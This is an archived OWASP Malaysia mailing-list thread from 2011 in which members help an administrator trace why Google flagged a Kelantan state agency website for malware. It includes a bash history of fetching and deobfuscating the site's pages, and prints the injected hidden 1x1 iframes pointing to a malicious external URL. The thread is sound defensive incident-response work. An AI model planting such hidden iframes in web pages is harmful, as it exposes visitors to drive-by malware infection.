[Owasp-Malaysia] Malware Detected!

Mohd Syamsuri msyamsuri at gmail.com
Tue Feb 8 21:54:09 EST 2011


I still searching for the source..
last week i ask practical student to upload images on the site...
after they have finish the job than uncle G block my site.

I have "quarantine" their laptop... :p


** kesian budak-budak IT Malaysia. Mereka hanya di ajar utk lulus exam...


On Wed, Feb 9, 2011 at 9:45 AM, Sharuzzaman Ahmat Raslan <
sharuzzaman at gmail.com> wrote:

> Please check how the line got injected into your system.
>
> You need to find the source of the problem to make sure it will not happen
> again.
>
>
>
>
> On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>
>> Mr Adnan thanks for the info and guide..
>>
>> I have clean all the mess and the site is up and running again..
>>
>> thanks to all too..
>>
>> ** I will blog this so others can make it as a guide...
>>
>>
>> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <
>> adnan.shukor at gmail.com> wrote:
>>
>>> mamp <= LOL typo.. it should be nano
>>> js <= one of hte binary in Spidermonkey. get the patched version
>>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>>> working on MacOS/Darwin, apply this patch
>>>
>>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>>
>>> thanks
>>>
>>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>>> <sharuzzaman at gmail.com> wrote:
>>> > I can see 2 interesting apps/scripts:
>>> >
>>> > 1. mamp
>>> > 2. /opt/analysis/js/js
>>> >
>>> > care to share? hopefully it is open source ;)
>>> >
>>> >
>>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>>> > <adnan.shukor at gmail.com> wrote:
>>> >>
>>> >> Here is my bash history:
>>> >>
>>> >> xanda:tmp adnan$ history
>>> >> <snip>
>>> >>  500  cd /tmp
>>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>>> >>  503  nano indexsedc.php
>>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>>> >>  505  mamp indexsedc.php.1
>>> >>  506  nano indexsedc.php.1
>>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>>> >>  508  nano sedc.php
>>> >>  509  wget http://www2.pkink.gov.my/default.php
>>> >>  510  nano default.php
>>> >>  511  nano default.php
>>> >>  512  clear
>>> >> <I've remove tags and leave clean JavaScript inside>
>>> >>  513  mv default.php default.txt
>>> >>  514  /opt/analysis/js/js < default.txt
>>> >>  515  cat write.log
>>> >>  516  history
>>> >> xanda:tmp adnan$
>>> >>
>>> >> Below is the output of the cat:
>>> >> [output]
>>> >> xanda:tmp adnan$ cat write.log
>>> >> <iframe width="1" height="1"
>>> >>
>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> "></iframe>"<iframe
>>> >> width="1" height="1"
>>> >>
>>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> "></iframe>"
>>> >> [/output]
>>> >>
>>> >>
>>> >> Hint: you might use modified version of spidermonkey to 'understand'
>>> >> the javascript
>>> >>
>>> >> Thanks
>>> >>
>>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>>> >> > thanks for the info..
>>> >> > i will check all the file.
>>> >> >
>>> >> > how you found it?
>>> >> >
>>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>>> >> > <adnan.shukor at gmail.com> wrote:
>>> >> >>
>>> >> >> Here is the flow:
>>> >> >>
>>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>>> >> >> 2) and your sedc.php has an iframe to default.php
>>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>>> >> >> actually create an iframe to
>>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >>
>>> >> >> thanks :)
>>> >> >>
>>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>>> wrote:
>>> >> >> > can you point...
>>> >> >> > my index.htm or indexsedc.php or other file?
>>> >> >> >
>>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>>> >> >> > <adnan.shukor at gmail.com> wrote:
>>> >> >> >>
>>> >> >> >> you have iframe pointed to
>>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>> >> >> >>
>>> >> >> >> which is not xss :)
>>> >> >> >>
>>> >> >> >> >From my personal point of view, its either caused by:
>>> >> >> >> 1) malware on pc which has been used for ftp/access to the
>>> server
>>> >> >> >> 2) compromised server
>>> >> >> >>
>>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>>> >> >> >> mycert at mycert.org.my for further analysis :)
>>> >> >> >>
>>> >> >> >> thanks
>>> >> >> >>
>>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
>>> wrote:
>>> >> >> >> > I have check it.
>>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <
>>> rastaboyz at gmail.com>
>>> >> >> >> > wrote:
>>> >> >> >> >>
>>> >> >> >> >> Hi Mohd Symsuri,
>>> >> >> >> >>
>>> >> >> >> >> Why dont you check on the reason why its being blocked, it
>>> might
>>> >> >> >> >> help.
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>>> >> >> >> >>
>>> >> >> >> >> Regards,
>>> >> >> >> >> Kishur
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>>> >> >> >> >> <msyamsuri at gmail.com>
>>> >> >> >> >> wrote:
>>> >> >> >> >>>
>>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>>> >> >> >> >>> I need some advise.
>>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for
>>> almost
>>> >> >> >> >>> 4
>>> >> >> >> >>> days.
>>> >> >> >> >>> It said that we host malware on our server Malware Detected!
>>> (
>>> >> >> >> >>> Google
>>> >> >> >> >>> said that!!)
>>> >> >> >> >>> What i did is..
>>> >> >> >> >>> 1. Scan all the data and upload a new data
>>> >> >> >> >>> 2. Check the index.html or index.php
>>> >> >> >> >>> 3. Scan using web scanner using
>>> >> >> >> >>> http://www.avgthreatlabs.com/
>>> >> >> >> >>> http://www.virustotal.com
>>> >> >> >> >>> but still get block..
>>> >> >> >> >>> Googel said Suspected injected code
>>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>>> >> >> >> >>> NAME="confcontent"
>>> >> >> >> >>> scrolling=yes >
>>> >> >> >> >>> I have using this code for almost 2 years
>>> >> >> >> >>> What should i do now?
>>> >> >> >> >>>
>>> >> >> >> >>> --
>>> >> >> >> >>> best regard
>>> >> >> >> >>> syamsuri
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>> _______________________________________________
>>> >> >> >> >>> Owasp-Malaysia mailing list
>>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >> >>>
>>> >> >> >> >>> OWASP Malaysia Wiki
>>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>>> >> >> >> >>>
>>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> >> >> >> >>>
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >> _______________________________________________
>>> >> >> >> >> Owasp-Malaysia mailing list
>>> >> >> >> >> Owasp-Malaysia at lists.owasp.org
>>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >> >>
>>> >> >> >> >> OWASP Malaysia Wiki
>>> >> >> >> >> http://www.owasp.org/index.php/Malaysia
>>> >> >> >> >>
>>> >> >> >> >> OWASP Malaysia Wiki Facebook
>>> >> >> >> >>
>>> >> >> >> >>
>>> >> >> >> >>
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> > --
>>> >> >> >> > best regard
>>> >> >> >> > syamsuri
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> > _______________________________________________
>>> >> >> >> > Owasp-Malaysia mailing list
>>> >> >> >> > Owasp-Malaysia at lists.owasp.org
>>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >> >
>>> >> >> >> > OWASP Malaysia Wiki
>>> >> >> >> > http://www.owasp.org/index.php/Malaysia
>>> >> >> >> >
>>> >> >> >> > OWASP Malaysia Wiki Facebook
>>> >> >> >> >
>>> >> >> >> >
>>> >> >> >> >
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >> >
>>> >> >> >> _______________________________________________
>>> >> >> >> Owasp-Malaysia mailing list
>>> >> >> >> Owasp-Malaysia at lists.owasp.org
>>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >>
>>> >> >> >> OWASP Malaysia Wiki
>>> >> >> >> http://www.owasp.org/index.php/Malaysia
>>> >> >> >>
>>> >> >> >> OWASP Malaysia Wiki Facebook
>>> >> >> >>
>>> >> >> >>
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >> > --
>>> >> >> > best regard
>>> >> >> > syamsuri
>>> >> >> >
>>> >> >> >
>>> >> >> >
>>> >> >> > _______________________________________________
>>> >> >> > Owasp-Malaysia mailing list
>>> >> >> > Owasp-Malaysia at lists.owasp.org
>>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >> >
>>> >> >> > OWASP Malaysia Wiki
>>> >> >> > http://www.owasp.org/index.php/Malaysia
>>> >> >> >
>>> >> >> > OWASP Malaysia Wiki Facebook
>>> >> >> >
>>> >> >> >
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >> >
>>> >> >> _______________________________________________
>>> >> >> Owasp-Malaysia mailing list
>>> >> >> Owasp-Malaysia at lists.owasp.org
>>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >>
>>> >> >> OWASP Malaysia Wiki
>>> >> >> http://www.owasp.org/index.php/Malaysia
>>> >> >>
>>> >> >> OWASP Malaysia Wiki Facebook
>>> >> >>
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >
>>> >> >
>>> >> >
>>> >> > --
>>> >> > best regard
>>> >> > syamsuri
>>> >> >
>>> >> >
>>> >> >
>>> >> > _______________________________________________
>>> >> > Owasp-Malaysia mailing list
>>> >> > Owasp-Malaysia at lists.owasp.org
>>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >> >
>>> >> > OWASP Malaysia Wiki
>>> >> > http://www.owasp.org/index.php/Malaysia
>>> >> >
>>> >> > OWASP Malaysia Wiki Facebook
>>> >> >
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >> >
>>> >> _______________________________________________
>>> >> Owasp-Malaysia mailing list
>>> >> Owasp-Malaysia at lists.owasp.org
>>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >>
>>> >> OWASP Malaysia Wiki
>>> >> http://www.owasp.org/index.php/Malaysia
>>> >>
>>> >> OWASP Malaysia Wiki Facebook
>>> >>
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >
>>> >
>>> >
>>> > --
>>> > Sharuzzaman Ahmat Raslan
>>> >
>>> > _______________________________________________
>>> > Owasp-Malaysia mailing list
>>> > Owasp-Malaysia at lists.owasp.org
>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>> >
>>> > OWASP Malaysia Wiki
>>> > http://www.owasp.org/index.php/Malaysia
>>> >
>>> > OWASP Malaysia Wiki Facebook
>>> >
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>> >
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>>
>>
>>
>> --
>> best regard
>> syamsuri
>>
>>
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>
>
>
> --
> Sharuzzaman Ahmat Raslan
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>



-- 
best regard
syamsuri
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20110209/3ac503ca/attachment-0001.html 


More information about the Owasp-Malaysia mailing list